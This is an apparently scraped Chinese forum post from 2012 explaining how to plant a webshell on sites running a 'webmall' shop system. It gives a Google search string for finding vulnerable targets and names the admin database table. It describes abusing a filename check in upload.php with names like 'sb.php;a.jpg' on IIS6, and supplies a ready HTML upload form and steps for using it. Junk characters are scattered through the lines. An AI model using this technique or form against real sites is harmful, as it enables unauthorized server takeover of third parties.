关键字:inurl:webmall/detail.php?id
$ y$ m! \5 Z& x4 X) T
. y% ^4 V$ c# J- Q数据表:pwn_base_admin
8 k/ x4 `# ] [. t; S, k3 X4 ^
+ a8 ], O5 V! a4 K关于拿shell# r7 v: Q# B4 X7 V+ y" e: q
, `' G. V0 X- t' F y
首先登录后台admin.php
. [. P1 }1 L) J6 L. N
+ O0 U6 n$ V% g* L9 K- v, e1 j看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
/ A" M; G1 E. f- H( w, O2 U) R换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg2 ^: i, M! j( P# V/ F7 y4 ~3 b
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的$ R2 E! o4 |* T
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> ( d; w# V1 n- O2 y( t* S4 ^- A/ ^
<input type="text" name="fileName" value="sb.php;a.jpg" /> . u. m8 L- [/ @; f
<input type="hidden" name="attachPath" value="news/pics/" /> : a# P3 o6 t% M1 ~5 W
<input type="file" name="fileData" size="14" /></td>
$ K% b3 e1 y5 {, V! z<input type="submit" name="button" value="确定" />
9 S0 T& u9 H: |3 p/ a3 S( U5 `</form>. ]: u W. r0 r0 g3 I
3 z5 t" x4 ]1 W) X, T* ~ E
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
. l0 \& `7 ?) I
2 ^* j5 N9 l6 |, I' @3 F: [# ? |
发表于 2012-11-9 20:52:15
收藏
支持
反对